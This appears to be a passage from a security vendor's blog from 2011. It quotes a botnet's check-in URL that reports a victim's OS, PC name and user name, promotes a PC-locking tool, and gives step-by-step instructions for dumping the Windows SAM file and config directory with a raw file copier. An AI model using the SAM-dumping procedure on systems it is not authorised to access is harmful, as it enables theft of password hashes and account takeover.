/bot.php?b=save&windows=Microsoft%20Windows%20NT%205.1.2600%20Service%20Pack%203&pcname=PCNAME&userna=UserName

More details about this exploit kit can be found here:
Nuevo Botnet Contra Mexico: Karn!v0r3x

Lock your PC with Smart PC Locker Pro

admin — Fri, 30 Dec 2011 17:10:38 +0000

Smart PC Locker Pro is a lightweight and powerful application designed to lock your computer and all its functions so that no one can access your personal data, you can now move away from the PC safely. The program locks the entire system and it disables the task manager and all CD-ROM drives, so that a possible intruder can not bypass our tool with autorun.inf of CD-ROMs or USBs.

How can I lock my PC

1) Install and open Smart PC Locker Pro

2) Set your password and then click “Save” button

3) Edit Settings TAB as you prefer

4) If you have installed EXE Radar Pro, add to the whitelist the following file:

C:\Program Files\NoVirusThanks\Smart PC Locker Pro\Stub.exe

5) Now click the button “Lock PC” to lock your Computer:

Or use the “Lock Computer” option from the tray icon:

Dump SAM Files and System32\Config Directory with Fast Raw File Copier

admin — Thu, 29 Dec 2011 21:09:43 +0000

Fast Raw File Copier Pro easily allows you to copy files while showing progress percentages as well as the ability to copy files which generally cannot be copied through traditional means in the Windows OS. An example of a file which cannot be copied due to built-in Windows OS protection is the SAM file which contains user password hashes, this file is no problem for Fast Raw File Copier Pro nor is other protected files alike.

What is SAM file ?

The Security Accounts Manager (SAM) is a registry file in Windows NT, Windows 2000, Windows XP, Windows Vista and Windows 7. It stores users’ passwords in a hashed format (in LM hash and NTLM hash). Since a hash function is one-way, this provides some measure of security for the storage of the passwords. Read more…

I am going to use Fast Raw File Copier Pro to dump the entire content of the protected directory C:\WINDOWS\system32\config\ that contain sensitive files, such as SAM file and registry files.

1) Open Fast Raw File Copier Pro and select source directory:

2) Click on “Settings” and remove the check on “Recursive copy files”:

3) Click the button “Copy Files” to start the cloning of the \config\ directory:

4) Now check the destination directory to see the dumped files:

Read more about Fast Raw File Copier Pro.